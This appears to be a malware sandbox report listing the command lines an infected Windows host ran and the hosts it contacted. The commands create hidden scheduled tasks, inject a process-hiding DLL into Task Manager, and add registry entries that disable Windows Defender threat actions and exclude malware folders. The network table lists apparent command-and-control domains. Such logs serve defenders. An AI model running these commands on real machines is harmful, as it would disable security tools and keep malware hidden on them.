C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glrLJrRva"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bokvhhUgtHQNbUrNPU" /SC once /ST 17:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe\" r1 /LNsite_idduL 525403 /S" /V1 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe
C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\gDwSKdh.exe r1 /LNsite_idduL 525403 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNeYrIDgN" /SC once /ST 05:31:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNeYrIDgN"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| PA | 200.46.202.73:80 | cczhk.com | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| US | 172.67.171.112:80 | def.bestsup.su | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | 206.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.202.46.200.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.171.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.4.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.137.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| PA | 200.46.202.73:80 | cczhk.com | tcp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
